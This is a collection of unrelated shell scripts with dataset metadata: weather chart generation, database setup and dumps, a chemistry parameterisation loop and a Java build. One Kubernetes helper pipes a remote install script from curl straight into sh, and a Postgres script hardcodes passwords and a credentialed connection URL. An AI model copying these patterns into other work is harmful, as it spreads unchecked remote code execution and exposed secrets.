# Execute the GEMPAK program
$GEMEXE/gdplot2_gif << EOF
! 700MB HEIGHTS/TEMPERATURES
restore $NTS/base_nh.nts
restore $NTS/700_hgt_tmp.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgttmp700dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgttmp700lab}
l
r
! 500MB HEIGHTS/TEMPERATURES
restore $NTS/base_nh.nts
restore $NTS/500_hgt_tmp.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgttmp500dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgttmp500lab}
l
r
! 300MB HEIGHTS/ISOTACHS
restore $NTS/base_nh.nts
restore $NTS/300_hgt_iso.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgtiso300dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = 1/1/1/1/5;5 !
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtiso300lab}
l
r
! 250MB HEIGHTS/TEMPERATURES
restore $NTS/base_nh.nts
restore $NTS/250_hgt_tmp.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgttmp250dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgttmp250lab}
l
r
! 250MB ANALYSIS HEIGHTS/ISOTACHS
restore $NTS/base_nh.nts
restore $NTS/250_hgt_iso.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${hgtiso250dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
MAP = 0
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtiso250lab}
l
r
! 200MB HEIGHTS/ISOTACHS
restore $NTS/base_nh.nts
restore $NTS/200_hgt_iso.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgtiso200dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = 1/1/1/1/5;5 !
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtiso200lab}
l
r
! 100MB HEIGHTS/TEMPERATURES
restore $NTS/base_nh.nts
restore $NTS/100_hgt_tmp.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgttmp100dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgttmp100lab}
l
r
! 100MB HEIGHTS/ISOTACHS
restore $NTS/base_nh.nts
restore $NTS/100_hgt_iso.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgtiso100dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = 1/1/1/1/5;5 !
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtiso100lab}
l
r
! ANALYSIS MSLP/1000-500 THICKNESS
restore $NTS/base_nh.nts
restore $NTS/sfc_mslp_thk.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${mslpthksfcdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
MAP = 0
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${mslpthksfclab}
l
r
! ANALYSIS MSLP/1000-500 THICKNESS (US/CANADA)
restore $NTS/base_uscan.nts
restore $NTS/sfc_mslp_thk.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${mslpthksfcusdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
MAP = 0
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${mslpthksfclab}
l
r
! 500MB ANALYSIS HEIGHTS/VORTICITY
restore $NTS/base_nh.nts
restore $NTS/500_hgt_vor.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${hgtvor500dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
MAP = 0
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtvor500lab}
l
r
! 500MB ANALYSIS HEIGHTS/VORTICITY (US/CANADA)
restore $NTS/base_uscan.nts
restore $NTS/500_hgt_vor.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${hgtvor500usdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
TITLE = 1/3/${hgtvor500lab}
l
r
! ANALYSIS LIFTED INDEX
restore $NTS/base_nh.nts
restore $NTS/100_lift.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${liftdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${liftlab}
l
r
! ANALYSIS TROPOPAUSE PRESSURE/WIND SHEAR
restore $NTS/base_nh.nts
restore $NTS/trop_pres_wshr.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${prswshtropdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${prswshtroplab}
l
r
! ANALYSIS 700MB RELATIVE HUMIDITY AND VERTICAL VELOCITY
restore $NTS/base_nh.nts
restore $NTS/700_rel_vvel.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${rhvvel700dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${rhvvel700lab}
l
r
exit
EOF
$GEMEXE/gpend
if [ $SENDCOM = YES ]; then
# Copy the GIF images into my area
cp ${hgttmp700dev} ${COMOUT}
cp ${hgttmp500dev} ${COMOUT}
cp ${hgtiso300dev} ${COMOUT}
cp ${hgtiso250dev} ${COMOUT}
cp ${hgttmp250dev} ${COMOUT}
cp ${hgtiso200dev} ${COMOUT}
cp ${hgtiso100dev} ${COMOUT}
cp ${hgttmp100dev} ${COMOUT}
cp ${mslpthksfcdev} ${COMOUT}
cp ${mslpthksfcusdev} ${COMOUT}
cp ${hgtvor500dev} ${COMOUT}
cp ${hgtvor500usdev} ${COMOUT}
cp ${liftdev} ${COMOUT}
cp ${prswshtropdev} ${COMOUT}
cp ${rhvvel700dev} ${COMOUT}
# Copy the GIF images onto the NCDC area on the public ftp server
if [ $SENDDBN = YES ]; then
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp700dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp500dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtiso300dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtiso250dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp250dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtiso200dev}
# $DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp200dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtiso100dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp100dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${mslpthksfcdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${mslpthksfcusdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtvor500dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtvor500usdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${liftdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${prswshtropdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${rhvvel700dev}
# Convert the 500mb NH Hgts/Temps chart to tif, attach a heading and
# send to TOC via the NTC
fi
export input=${COMOUT}/${hgttmp500dev}
export HEADER=YES
export OUTPATH=$DATA/gfs_500_hgt_tmp_nh_anl_${cyc}.tif
${UTILgfs}/ush/make_tif.sh
fi
msg=" GEMPAK_GIF ${fhr} hour completed normally"
postmsg "$jlogfile" "$msg"
exit
| true |
97aee4a4bf416f7b7db6c94e6b3537ffd8310804 | Shell | baden/navi.cc | /init-scripts/sdk-requirements.sh | UTF-8 | 130 | 2.578125 | 3 | [] | no_license | #!/bin/bash
if [[ $EUID -ne 0 ]]; then
echo "Fail. This script must be run as root." 1>&2
exit 1
fi
npm install -g brunch
| true |
3231cd22f2ea014174752606bb7e392ce9609633 | Shell | ogomez-stratio/test-mavenApp | /environment/containers/deployment/scripts/postgres/scd_nps/create_tables_that_dont_exist_and_add_data.sh | UTF-8 | 2,132 | 4.09375 | 4 | [] | no_license | #!/usr/bin/env bash
# create_tables_that_dont_exist.sh - Creates tables that do not exist
# Luis Rodero Merino - lrodero@stratio.com
##########################
## Variables definition ##
##########################
PROGNAME=$(basename $0)
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
USER=sanitas
PASSWD=Sanitas2016
HOST=scd-postgresbdc
PORT=5432
DB=sanitasdb
SCHEMA=seguros
MODIFY_ALL=0 # default value
TABLE_NAME=$1
##########################
# Functions Area #
##########################
# DO NOT MODIFY ANYTHING #
# WITHIN THIS AREA #
##########################
function error_exit
{
# ----------------------------------------------------------------
# Function for exit due to fatal program error
# Accepts 1 argument:
# string containing descriptive error message
# ----------------------------------------------------------------
echo "${PROGNAME} - ${1:-"Unknown Error"}" 1>&2
exit 1
}
function test_psql {
# ----------------------------------------------------------------
# Function for testing whether psql command is installed
# ----------------------------------------------------------------
if test -e /usr/bin/psql; then
echo "Psql... OK!"
else
error_exit "There is no Psql client installed"
fi
}
function create {
# ----------------------------------------------------------------
# Function for deleting a table in a remote postgres
# ----------------------------------------------------------------
echo -n "Running create table script and add data Test... "
#sanitas database tables creation
(psql -v ON_ERROR_STOP=1 postgresql://postgres:stratio@scd-postgresbdc:5432/sanitasdb -f $DIR/tables_creation_and_data.sql > /dev/null && echo "OK!") || error_exit "Error creating structure"
echo -n "End create table script... "
}
####################################
# EXECUTION AREA #
####################################
# DANGER ZONE #
# DONT MODIFY ANYTHING BEYOND THIS #
# LINE IF YOU ARE NOT SURE #
####################################
test_psql
create
echo "Finished!!"
| true |
ed9310a56108be7879dcf22bcb1a3c6366160ff5 | Shell | sidneypaulymer/covid-moonshot-designs-spe | /Round1/02_x1093_modifications/01_x1093_extensions/01_antechamber/RUN-antechamber.zsh | UTF-8 | 429 | 2.5625 | 3 | [
"MIT"
] | permissive | #!/bin/zsh
declare -A compounds
compounds=( [0072]=S72 [0073]=S73 [0074]=S74 [0075]=S75 [0076]=S76 [0077]=S77 [0080]=S80 [0090]=S90 [0091]=S91 )
for mol id in ${(kv)compounds}; do
echo "=== SPE_${mol} :: $id ==="
antechamber -i ../SPE_${mol}.mol2 -fi mol2 -o SPE_${mol}a.mol2 -fo mol2 -c bcc -at gaff2 -pf yes -nc 1 -rn $id -dr no
parmchk2 -i SPE_${mol}a.mol2 -f mol2 -o SPE_${mol}.frcmod -s 2
echo "\n\n"
done
| true |
8a59d7ba31d2405d1008ec6e6b6fb0847caa5256 | Shell | linghuiliu/CosmiTestLCIO | /calice_sim/digitization/digisim/java/.svn/text-base/build.svn-base | UTF-8 | 1,195 | 2.625 | 3 | [] | no_license | #!/bin/sh
# Setup "default" CLASSPATH for JAS3 command-line run on nicadd cluster
#
# 20040525 - GLima - Adapted from Jeremy's script for non-projective .sio
# setup relative dirs using JAS3 app path (JAS3 variable required)
LCIO=/home/lima/work/local/lciodir
JAS3=/home/lima/work/local/jas3dir
JAS3_LIB=$JAS3/lib
JAS3_EXT=$JAS3/extensions
LCD_EXT=$HOME/.JAS3/extensions
# CP: include WD
CLASSPATH=.
# CP: lcio
CLASSPATH=$CLASSPATH:$LCIO/lib/lcio.jar
# CP: libs
CLASSPATH=$CLASSPATH:$JAS3_LIB/freehep-base.jar
CLASSPATH=$CLASSPATH:$JAS3_LIB/jas3.jar
CLASSPATH=$CLASSPATH:$JAS3_LIB/openide-lookup.jar
# CP: extensions
CLASSPATH=$CLASSPATH:$JAS3_EXT/jas3lcd.jar
#CLASSPATH=$CLASSPATH:$LCD_EXT/lcd.jar
#CLASSPATH=$CLASSPATH:$JAS3_EXT/lcd.jar
CLASSPATH=$CLASSPATH:/home/lima/work/jas/hep.lcd/head/lib/lcd.jar
CLASSPATH=$CLASSPATH:$JAS3_EXT/aida.jar
CLASSPATH=$CLASSPATH:$JAS3_EXT/aida-dev.jar
CLASSPATH=$CLASSPATH:$JAS3_EXT/freehep-hep.jar
# export (and print) CP
export CLASSPATH
#echo CLASSPATH=$CLASSPATH
echo javac -sourcepath . @files.lis
#gcj --classpath=$CLASSPATH @files.lis
javac -sourcepath . @files.lis \
&& echo "*** To run java analysis job:" \
&& echo java RawHistos inputfile
| true |
8e3547756b079423488b9e518aba05200909de02 | Shell | slopjong/Questionator | /build-catalog | UTF-8 | 896 | 3.953125 | 4 | [] | no_license | #!/bin/bash
generatePerChapter=false
catdir="Biology"
output="catalog.json"
# if only one argument was passed we assume it was -h
if [ $# -eq 1 ];
then
echo "Usage: build-catalog <catalog directory> <output file>"
fi
# if two arguments were passed the first will be the catalog directory
# and the last one the file which should be written to
if [ $# -eq 2 ];
then
catdir=$1
output=$2
fi
# convert the files to utf-8
#for i in $(ls -1 bio-*/*/*/{answers,questions}.txt);
#do
# #echo "Processing $i"
# file $i | grep -v UTF-8 #| cut -d ':' -f 1 | iconv -t utf-8 - | sponge $i
# #iconv -t utf-8 $i | sponge $i
#done
./generate-json per_chapter=${generatePerChapter} questionary=${catdir} catalog_filename=${output}
# don't reformat if the catalog is generated chapterwise
if [ -f "$output" -a "$generatePerChapter" == "false" ];
then
cat ${output} | json_reformat | sponge ${output}
fi
| true |
0deb14877d3f232ded1d382e513da7d75e714a30 | Shell | shineyr/Shell | /38_break.sh | UTF-8 | 190 | 3.359375 | 3 | [] | no_license | #!/bin/bash
# breaking out of a for loop
for var1 in 1 2 3 4 5 6 7 8 9 10
do
if [ $var1 -eq 5 ]
then
break
fi
echo "Iteration number: $var1"
done
echo "The for loop is completed"
| true |
6dc3225fe2a641640e2ecc77981419345f31dd15 | Shell | guitarrapc/dotnet-lab | /database/mssql/entityframework_mssql/sql/entrypoint.sh | UTF-8 | 1,785 | 3.71875 | 4 | [
"MIT"
] | permissive | #!/bin/bash
database=$SQLCMDDBNAME
# wait for SQL Server to come up
NEXT_WAIT_TIME=1
echo monitoring db server is online.
until /opt/mssql-tools/bin/sqlcmd -P $SA_PASSWORD -d master -Q 'select 0'; do
echo sleep ${NEXT_WAIT_TIME} sec for next interval
sleep ${NEXT_WAIT_TIME}
# MEMO: should timeout on 1min or above? if so, should pass crash log to the host for investigation.
if [ ${NEXT_WAIT_TIME} -ne 4 ]; then
NEXT_WAIT_TIME=$(( $NEXT_WAIT_TIME + 1 ))
fi
done
echo confirm db server is online.
echo importing data...
# run the init script to create the DB and the tables in /table
/opt/mssql-tools/bin/sqlcmd -P $SA_PASSWORD -d master -i ./init.sql
# create table
for entry in "table/*.sql"
do
echo executing $entry
/opt/mssql-tools/bin/sqlcmd -P $SA_PASSWORD -i $entry
done
# import the data from the csv files
mkdir -p ./data_conv
for entry in $(find data -name "*.csv")
do
# i.e: transform /data/MyTable.csv to MyTable
shortname=$(echo $entry | cut -f 1 -d '.' | cut -f 2 -d '/')
tableName=[$database].[dbo].[$shortname]
filename="$shortname.csv"
# convert utf8 to utf16le
echo converting $filename from utf8 to utf16
cat $(pwd)/data/$shortname.csv
iconv -f UTF8 -t UTF16 $(pwd)/data/$filename -o $(pwd)/data_conv/$filename
# csv can be both crlf and lf with ROWTERMINATOR 0x0A. dont't use ROWTERMINATOR \n as it force you use crlf for csv.
# csv must be utf16 encoding. both UTF-16BE and UTF-16LE is available in Bulk Insert. (you don't need to think about bom. )
# do not add (DATAFILETYPE = 'widechar') as it fail....
echo importing $tableName from $filename
/opt/mssql-tools/bin/sqlcmd -P $SA_PASSWORD -Q "BULK INSERT $tableName FROM '$(pwd)/data_conv/$filename' WITH ( FIELDTERMINATOR = ',', ROWTERMINATOR = '0x0A');"
done
| true |
0827f69e7945985324a88e3bd1d9a0a99c185a73 | Shell | marissaschmidt/PaymentAnalysis | /PaymentAnalysis/hive/src/util/generate-load-data-script.sh | UTF-8 | 460 | 3.625 | 4 | [] | no_license | #!/bin/bash
FUSEDFS_DIR=$HOME/mnt/hdfs/user/`whoami`
if [ $# -ne 2 ]
then
echo "Usage: $0 <input-dir> <output-dir>"
exit 1
fi
inputdir=$1
outfile="$2/load-data-payment.q"
rm ${outfile}
touch ${outfile}
data=${FUSEDFS_DIR}/${inputdir}
for f in ${data}/*
do
file=${f##*/}
echo "load data inpath '$1/$file'" >> ${outfile}
ind=[`expr index "$f" '-'`-1]
base=${file%%-*}
echo "into table $base;" >> ${outfile}
echo "" >> ${outfile}
done
| true |
41a7c1e9915ced351492e64a9b085e2c22bb61ee | Shell | mmantho/bash-fsl-pipeline | /examples/sbfc/rsfc_3_group_multiple_model_feat.sh | UTF-8 | 2,137 | 3.125 | 3 | [] | no_license | #!/bin/bash
WORK_IN_CAB=0
# ====== init params ===========================
if [ $WORK_IN_CAB -eq 0 ]
then
GLOBAL_SCRIPT_DIR=/media/data/MRI/scripts
PROJ_DIR=/media/data/MRI/projects/CAB/fsl_belgrade_early_pd # <<<<@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
export FSLDIR=/usr/local/fsl # change according to used PC
else
GLOBAL_SCRIPT_DIR=/homer/home/dati/fsl_global_scripts
PROJ_DIR=/media/Iomega_HDD/MRI/projects/CAB/fsl_belgrade_early_pd # <<<<@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
export FSLDIR=/usr/share/fsl/4.1 # change according to used PC
fi
#===============================================
. $GLOBAL_SCRIPT_DIR/init_vars.sh $PROJ_DIR
#===============================================
SESS_ID=1
NUM_CPU=1
EXECUTE_SH=$GLOBAL_SCRIPT_DIR/process_group/rsfc_multiple_model_group_feat.sh
. $PROJ_SCRIPT_DIR/subjects_list.sh
INPUT_1stlevel_DIR="roi_right_caud_pall_put_thal_ortho_denoised"
OUTPUT_DIR=$PROJ_GROUP_ANALYSIS_DIR/sbfc/$INPUT_1stlevel_DIR
declare -a arr_fsf_templates=($PROJ_SCRIPT_DIR/glm/templates/groupfeat_ctrl28_treated45_naive21_maskgm )
str_arr_fsf_templates=`echo ${arr_fsf_templates[@]}`
CONTROLS_SUBJ_DIR=/media/data/MRI/projects/CAB/fsl_resting_belgrade_controls/subjects
# create 1st level feat dir list
first_level_feat_paths=""
for SUBJ_NAME in ${arr_controls28[@]}
do
first_level_feat_paths="$first_level_feat_paths $CONTROLS_SUBJ_DIR/$SUBJ_NAME/s$SESS_ID/resting/fc/feat/$INPUT_1stlevel_DIR"
done
for SUBJ_NAME in ${arr_treated45[@]}
do
. $GLOBAL_SCRIPT_DIR/subject_init_vars.sh
first_level_feat_paths="$first_level_feat_paths $RSFC_DIR/feat/$INPUT_1stlevel_DIR"
done
for SUBJ_NAME in ${arr_naive21[@]}
do
. $GLOBAL_SCRIPT_DIR/subject_init_vars.sh
first_level_feat_paths="$first_level_feat_paths $RSFC_DIR/feat/$INPUT_1stlevel_DIR"
done
#====================================================================================
. $MULTICORE_SCRIPT_DIR/define_thread_processes.sh $NUM_CPU $EXECUTE_SH "$str_arr_fsf_templates" $PROJ_DIR -odp $OUTPUT_DIR -ncope 8 $first_level_feat_paths
wait
echo "=====================> finished processing $0"
| true |
fa3e1f810cddbe59a3a98b95e34eb0997b5f1443 | Shell | gstonge/SIR-benchmark | /generate_networks.sh | UTF-8 | 772 | 2.921875 | 3 | [] | no_license | # Generates the edge lists for the benchmark
#--------------------------------------------
NSAMPLE=10
EDGELIST_PATH="dat/edge_lists/"
#generate the gnm networks
MLIST="50000 150000 500000 1500000 5000000"
for M in $MLIST
do
for SEED in $(seq 1 $NSAMPLE)
do
python generate_random_graph.py gnm 10000 -p $M -s $SEED > $EDGELIST_PATH/gnm_n1E4/m$M\_$SEED.txt
done
done
#generate the power law networks
NLIST="1000 3000 10000 30000 100000 300000 1000000"
for N in $NLIST
do
for SEED in $(seq 1 $NSAMPLE)
do
python generate_random_graph.py PL $N -p 3 2.25 -s $SEED > $EDGELIST_PATH/power_law_225/n$N\_$SEED.txt
python generate_random_graph.py PL $N -p 3 3.0 -s $SEED > $EDGELIST_PATH/power_law_300/n$N\_$SEED.txt
done
done
| true |
0db80c8c0f52c382a249080131cb6329769ec8d0 | Shell | jyao-SUSE-power-group/LinuxAutoShell | /kubernetes_start.sh | UTF-8 | 569 | 2.75 | 3 | [] | no_license | #!/usr/bin/env bash
# usage :
sleep 1;
for SERVICES in ` ls /usr/lib/systemd/system/kub* | awk -F '/' '{print $6}' ` docker ; do echo $SERVICES ; done ;
sh -c "$(curl -fsSL https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" ;
for SERVICES in ` ls /usr/lib/systemd/system/kub* | awk -F '/' '{print $6}' ` docker etcd ; do systemctl restart $SERVICES ; systemctl enable $SERVICES ; systemctl status $SERVICES ; systemctl start $SERVICES ; done ;
echo "sleep 2 s ,wait service loading!"
sleep 2;
## test kubectl
kubectl get nodes ;
| true |
4bd4486f1590c133c59e570544711d753ac2ccf7 | Shell | zwrawr/ludumdare | /sandbox/scripts/db/table-dump | UTF-8 | 911 | 4.25 | 4 | [
"MIT"
] | permissive | #!/bin/sh
if [ $# -lt 1 ]; then
>&2 echo "Usage: $0 table_name [additional arguments for mysqldump] > table_name.sql"
exit 1
fi
COMMAND=$0
COMMAND_PATH=`pwd -P`
FULL_ARGS=$@
TABLE=$1
shift
ARGS=$@
DB=`$COMMAND_PATH/database-get`
if [ $? -ne 0 ]; then
>&2 echo "Error: Unable to fetch database name"
exit 1
fi
TABLE_VERSION=`$COMMAND_PATH/config-get-value $TABLE`
if [ $? -ne 0 ]; then
>&2 echo "Error: Unable to fetch table version from config"
exit 1
fi
echo "-- $COMMAND -- Starship table dump script"
echo "-- Options: $FULL_ARGS"
echo
mysqldump $DB $TABLE $ARGS
# Only add commands for setting the version if NOT the config table
if [ "$TABLE" != "cmw_config" ]; then
echo
echo "-- Set the table version inside the config"
echo "LOCK TABLES \`cmw_config\` WRITE;"
echo "INSERT INTO \`cmw_config\` (\`key\`,\`value\`) VALUES ('$TABLE','$TABLE_VERSION');"
echo "UNLOCK TABLES;"
fi
exit 0
| true |
cc5614461af90cc62bc4c24a8310c920cbfd88aa | Shell | nklapste/deadSFS | /server/add_user.sh | UTF-8 | 521 | 3.640625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Add a new user to the deadSFS FTP server
NEW_USER=$1
NEW_USER_GROUP=$2
groupadd ${NEW_USER_GROUP}
useradd ${NEW_USER}
passwd ${NEW_USER}
usermod -a -G ${NEW_USER_GROUP} ${NEW_USER}
FTP_HOME="/var/ftp/ece_422_security_project/home"
usermod -d ${FTP_HOME} ${NEW_USER}
NEW_USER_HOME="${FTP_HOME}/${NEW_USER}"
mkdir ${NEW_USER_HOME}
chown ${NEW_USER}:${NEW_USER_GROUP} ${NEW_USER_HOME}
chmod 750 ${NEW_USER_HOME}
echo "Added new user: ${NEW_USER} with group: ${NEW_USER_GROUP} to the ftp server"
| true |
b8c691c07ad0fd78970007c290ab38b44416f5d9 | Shell | sfjadi2010/HealthCatalystTask | /Server/entrypoint.sh | UTF-8 | 244 | 2.71875 | 3 | [] | no_license | #!/bin/bash
set -e
run_cmd="dotnet watch -p PersonSearch run"
dotnet restore
until dotnet ef -s PersonSearch -p PersonSearch database update; do
>&2 echo "DB is starting up"
sleep 1
done
>&2 echo "DB is up - executing command"
exec $run_cmd | true |
3a6683ff0133a5a0d4ff85ad237f2a30bb970fac | Shell | Backup-Gits/0019-scripts | /build/4.0.0/pkg/script/script.pkg.d/script/getuptime | UTF-8 | 460 | 3.21875 | 3 | [] | no_license | #!/bin/bash
#set -x
days=`uptime|grep day`
if [ "$days" != "" ];then
days=`uptime|awk '{print $3}'|sed s/,//g`
time=`uptime|awk '{print $5}'|sed s/,//g`
else
days="0"
time=`uptime|awk '{print $3}'|sed s/,//g`
fi
min=`echo $time|grep ':'`
if [ "$min" != "" ];then
hour=`echo $time|awk -F":" '{print $1}'`
min=`echo $time|awk -F":" '{print $2}'`
else
hour="0"
min=`echo $time`
fi
echo "$days Day $hour Hour $min Min"
#echo $time
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.